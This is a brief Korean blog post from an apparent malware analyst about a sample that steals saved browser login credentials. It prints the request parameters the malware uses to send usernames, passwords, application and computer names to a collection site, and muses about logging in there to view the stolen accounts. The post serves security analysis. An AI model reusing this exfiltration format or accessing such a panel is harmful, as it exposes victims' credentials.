연구 자료/악성코드 분석

웹브라우저 자동로그인 계정정보 탈취?

단디연구소 2016. 1. 28. 14:12

악성코드 분석 중에 웹브라우저 자동로그인 계정정보 탈취?를 하는 악성코드가 있었다 . 


어떤 웹사이트에 계정정보를 보내는듯 했다. 해당 사이트는 로그인이 필요 했고 .. 로그인만하면.. 탈취된 계정을 전부 볼수 있지 않을까???


전송 방법

?action=add&username=[username]&password=[password]&app=[application]&pcname=[computer_name]&sitename=[server_address]





# 그런데 ISI AGU TEAMS ?????